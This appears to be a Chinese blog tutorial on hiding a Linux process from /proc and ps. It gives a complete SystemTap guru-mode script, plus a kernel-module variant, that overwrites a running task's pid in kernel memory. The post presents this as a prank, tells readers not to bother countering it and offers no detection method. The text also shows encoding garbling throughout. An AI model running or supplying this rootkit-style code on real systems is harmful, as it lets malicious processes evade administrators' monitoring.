總有朋友問隱藏Linux進(jìn)程的方法，我說你想隱藏到什么程度，是大隱于內(nèi)核，還是小隱于用戶。

網(wǎng)上通篇論述的無外乎hook掉procfs或者類似的用戶態(tài)方案，也都難免長(zhǎng)篇大論，我說，這些場(chǎng)面都太大了，太復(fù)雜了。對(duì)于希望馬上看到效果的而言，看到這么一堆復(fù)雜的東西，大概率望而卻步。

本文介紹一種將Linux進(jìn)程小隱于用戶的非常規(guī)方法，僅僅一行代碼：

修改掉進(jìn)程的pid即可。

注意是小隱，所以，不值得反制，逗一下高級(jí)會(huì)議工程師搞個(gè)惡作劇玩玩得了。
target->pid = 0x7fffffff;

完整的腳本如下：

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
 struct task_struct *target;

 target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
 target->pid = 0x7fffffff;
%}

probe begin
{
 pid = $1
 hide(pid);
 exit();
}

來來來，試一下：

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]# 

用下面的命令可以檢測(cè)所有可顯示進(jìn)程的二進(jìn)制文件：

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
 ls -l /proc/$pid/exe; 
done

procfs里沒了，ps當(dāng)然就檢測(cè)不到了。

如果你覺得guru模式的stap怪怪的，那么你完全可以編寫自己獨(dú)立的Linux kernel module，采用修改完即退的方法：

target->pid = xxxx;
return -1;

是不是比各種hook法簡(jiǎn)單多了，所謂的 動(dòng)數(shù)據(jù)而不要?jiǎng)哟a！

簡(jiǎn)單的說一下原理。

• task被創(chuàng)建的時(shí)候，根據(jù)其pid注冊(cè)procfs目錄結(jié)構(gòu)。
• 展示procfs目錄結(jié)構(gòu)的時(shí)候，遍歷task list以其pid作為key來查找procfs目錄結(jié)構(gòu)。
• 0x7fffffff(或者任何其它合理的值)根本沒有注冊(cè)過，當(dāng)然無法顯示。

不多說。

再次聲明，不要試圖對(duì)本文所描述的方法進(jìn)行反制，因?yàn)檫@么簡(jiǎn)單的東西根本不值得反制，哈哈，不是嗎？

可以參考我之前的Rootkit系列文章來繼續(xù)研究Linux進(jìn)程大隱于內(nèi)核的方法。同時(shí)，每一種方法我都給出了反制措施。

到此這篇關(guān)于一行代碼教你如何隱藏Linux進(jìn)程的文章就介紹到這了,更多相關(guān)Linux隱藏進(jìn)程內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評(píng)論